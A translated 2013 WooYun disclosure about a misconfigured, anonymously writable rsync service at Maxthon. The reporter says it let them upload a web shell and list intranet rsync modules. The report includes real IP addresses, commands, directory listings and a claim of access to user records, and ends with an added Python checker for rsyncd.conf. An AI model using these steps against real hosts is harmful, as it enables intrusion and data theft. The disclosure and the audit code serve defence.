Vulnerability summary

Defect ID: wooyun-2013-039755

Title: A misconfigured service at Maxthon (傲游) leads to intranet compromise and could leak the information of two million users

Affected vendor: Maxthon (傲游)

Author: 想要减肥的胖纸

Submitted: 2013-10-15 09:06

Fixed: 2013-11-29 09:07

Published: 2013-11-29 09:07

Vulnerability type: improper system/service operations configuration

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-10-15: Details sent to the vendor; awaiting the vendor's handling
2013-10-15: Vendor has confirmed; details disclosed to the vendor only
2013-10-25: Details disclosed to core white hats and experts in the relevant field
2013-11-04: Details disclosed to regular white hats
2013-11-14: Details disclosed to intern white hats
2013-11-29: Details disclosed to the public

Brief description:

I don't know whether this duplicates the one someone else submitted on September 27. I tested it again today and the problem still exists, so it should not be that earlier one.

Detailed description:

rsync is misconfigured; a shell can be uploaded directly.

HellentekiMacBook-Pro:tools Hellen$ rsync 60.28.220.72::bbs_glusterfs
drwxrwxr-x 8192 2013/05/08 18:49:43 .
drwxrwxrwx 8192 2013/10/01 00:08:27 attachments
drwxr-xr-x 8192 2012/09/04 05:38:21 forumdata
drwxrwxrwx 8192 2012/09/01 06:09:59 poll
HellentekiMacBook-Pro:tools Hellen$


Got a shell directly.

[screenshot: QQ20131015-27@2x.png]

Proof of vulnerability:

Millions of user records...

[screenshot: QQ20131015-28@2x.png]


The intranet uses rsync to back up employee email. I honestly couldn't be bothered to look through it, otherwise there would surely have been more to find.

[/data/html/bbs.mx/forumdata/cache/]$ rsync 192.168.0.12::mail_data
drwxr-xr-x 4096 2012/08/30 19:14:40 .
drwx------ 4096 2012/09/04 22:22:46 domains


All sorts of anonymous rsync access on the intranet:

[/data/html/bbs.mx/forumdata/cache/]$ rsync 192.168.0.39::bbs
drwxrwxr-x 4096 2012/09/04 05:13:03 .
-rwxrwxr-x 4303 2009/09/15 13:09:41 admincp.php
-rwxrwxr-x 8235 2009/09/15 13:24:02 ajax.php
-rwxrwxr-x 1534 2009/09/15 13:09:41 announcement.php
-rwxrwxr-x 8324 2009/09/15 13:09:41 attachment.php
lrwxrwxrwx 24 2012/09/04 05:12:51 attachments
-rw-r--r-- 2796002 2011/03/22 18:22:38 bbs-trunk.zip
-rwxrwxr-x 1953 2009/09/15 13:09:41 campaign.php
-rwxr-xr-x 4014 2012/08/14 10:54:26 config.inc.php
-rwxrwxr-x 106 2009/09/02 10:02:47 crossdomain.xml
-rwxrwxr-x 121996 2009/09/15 13:09:41 d60to70.php.tmp.bak
-rwxrwxr-x 147 2009/09/15 13:09:41 discuz_version.php
-rwxrwxr-x 8079 2009/09/15 13:09:41 eccredit.php
-rwxrwxr-x 4053 2009/09/15 13:09:41 faq.php
-rwxrwxrwx 1150 2011/03/21 17:10:27 favicon.ico
lrwxrwxrwx 21 2012/09/04 05:13:03 forumdata
-rwxrwxr-x 17463 2009/09/15 13:09:41 forumdisplay.php
-rwxrwxr-x 1260 2009/09/15 13:09:41 frame.php
-rwxrwxr-x 10032 2009/09/22 18:05:00 index.php
-rwxrwxr-x 4900 2009/09/15 13:09:41 invite.php
-rwxrwxr-x 1546 2009/09/15 13:09:41 leftmenu.php
-rwxrwxr-x 20227 2011/11/25 15:13:12 logging.php
-rwxrwxr-x 20611 2009/09/15 13:09:41 magic.php
-rwxrwxr-x 3302 2009/09/15 13:09:41 medal.php
-rwxrwxr-x 12943 2009/09/15 13:09:41 member.php
-rwxrwxr-x 37102 2009/09/15 13:09:41 memcp.php
-rwxrwxr-x 42767 2009/09/15 13:09:41 misc.php
-rwxrwxr-x 5603 2009/09/15 13:09:41 modcp.php
-rwxrwxr-x 32143 2009/11/26 18:37:32 my.php
-rwxrwxr-x 906 2009/09/15 13:09:41 plugin.php
-rwxrwxr-x 12698 2009/10/10 09:38:38 pm.php
-rwxrwxr-x 11586 2009/09/16 11:50:17 post.php
-rwxrwxr-x 3464 2009/09/15 13:09:41 redirect.php
-rwxrwxr-x 12427 2012/08/10 10:47:01 register.php
-rwxrwxr-x 3434 2009/09/15 13:09:41 relatekw.php
-rwxrwxr-x 5688 2009/09/15 13:09:41 relatethread.php
-rwxrwxr-x 8419 2009/10/10 16:43:16 reusername.php
-rwxrwxr-x 721 2009/09/02 10:02:47 robots.txt
-rwxrwxr-x 5898 2010/04/12 10:51:42 rss.php
-rwxrwxr-x 10227 2009/09/15 13:09:41 search.php
-rwxrwxr-x 2038 2009/09/15 13:09:41 seccode.php
-rwxrwxr-x 3521 2009/09/15 13:09:41 sitemap.php
-rwxrwxr-x 7688 2009/09/15 13:09:41 space.php
-rwxrwxr-x 38482 2009/10/21 13:25:32 stats.php
-rwxrwxr-x 5962 2009/09/15 13:09:41 tag.php
-rwxrwxr-x 16187 2009/09/15 13:09:41 task.php
-rwxrwxr-x 17 2009/10/23 14:42:20 test.php
-rwxrwxr-x 1044 2009/09/15 13:09:41 topic.php
-rwxrwxr-x 25242 2009/09/15 13:09:41 topicadmin.php
-rwxrwxr-x 9795 2009/09/15 13:09:41 trade.php
-rwxrwxr-x 1010 2009/09/15 13:09:41 video.php
-rwxrwxr-x 30266 2012/09/26 13:33:33 viewthread.php
drwxrwxr-x 4096 2011/03/22 18:17:44 __MACOSX
drwxrwxr-x 4096 2009/10/29 16:23:22 admin
drwxrwxr-x 4096 2009/09/27 21:45:46 api
drwxrwxr-x 4096 2009/09/27 21:45:46 archiver
drwxrwxr-x 4096 2009/09/27 16:32:05 attachments.local
drwxr-xr-x 4096 2011/03/22 18:23:18 css
drwxrwxr-x 4096 2009/09/27 21:45:46 forumdata.local
drwxrwxr-x 4096 2011/03/22 18:23:24 images
drwxrwxr-x 4096 2009/10/19 18:59:42 include
drwxrwxr-x 4096 2009/09/27 21:45:46 ipdata
drwxrwxr-x 4096 2011/05/25 14:39:12 maxthon
drwxrwxr-x 4096 2009/09/27 21:45:46 modcp
drwxrwxr-x 4096 2009/09/27 21:45:46 plugins
drwxr-xr-x 4096 2012/09/03 18:51:03 poll
drwxrwxr-x 4096 2011/03/22 18:23:30 templates
drwxrwxr-x 4096 2009/09/27 21:45:46 uc_client
drwxrwxr-x 4096 2009/09/27 21:45:46 uc_server
drwxrwxr-x 4096 2009/11/26 14:52:35 update20091128
drwxrwxr-x 4096 2013/09/27 21:26:57 wap


Fix recommendation:

Security starts with the small things.
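As an added example (not code from this report or from Maxthon), a small audit of rsyncd.conf that flags modules exposed the way the listings above show: no `auth users`, no `hosts allow`, `read only = no`, or served as root. The sample config is constructed; the module names echo the report, but the paths and settings are assumptions.

```python
import configparser
from typing import Dict, List, Tuple

# Constructed sample, not the vendor's real config: one module exposed the way the
# report describes (anonymous, writable, served as root) and one hardened module.
SAMPLE_RSYNCD_CONF = """\
uid = root
gid = root

[bbs_glusterfs]
path = /data/html/bbs.mx
read only = no

[mail_data]
path = /data/mail
read only = yes
auth users = backup
secrets file = /etc/rsyncd.secrets
hosts allow = 192.168.0.12
uid = nobody
"""

Finding = Tuple[str, str]  # (module name, problem)

def _truthy(value: str) -> bool:
    """rsyncd.conf boolean: yes/true/1 count as true, anything else as false."""
    return value.strip().lower() in ("yes", "true", "1")

def parse_rsyncd_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the INI-like rsyncd.conf; keys before the first [module] act as defaults."""
    cp = configparser.ConfigParser(interpolation=None, default_section="global")
    cp.read_string("[global]\n" + text)
    return {name: dict(cp[name]) for name in cp.sections()}

def audit_rsyncd_conf(text: str) -> List[Finding]:
    """Flag modules an unauthenticated client on any host could read or write."""
    findings: List[Finding] = []
    for name, opts in parse_rsyncd_conf(text).items():
        anonymous = "auth users" not in opts   # no per-module credentials required
        any_host = "hosts allow" not in opts   # no source-address restriction
        # rsync defaults when the option is absent: "read only = yes", "uid = nobody"
        writable = not _truthy(opts.get("read only", "yes"))
        if anonymous and any_host:
            findings.append((name, "readable by any host without authentication"))
            if writable:
                findings.append((name, "WRITABLE by any host without authentication"))
        if opts.get("uid", "nobody") == "root":
            findings.append((name, "daemon serves this module as root"))
    return findings
```

Run `audit_rsyncd_conf(open("/etc/rsyncd.conf").read())` on a real host; any "WRITABLE" finding is the condition that let a shell be uploaded here.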

Copyright notice: please credit the source when republishing: 想要减肥的胖纸@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2013-10-15 10:25

Vendor reply:

Thank you very much.

Latest status:

2013-10-15: Fixed. Thanks for the help.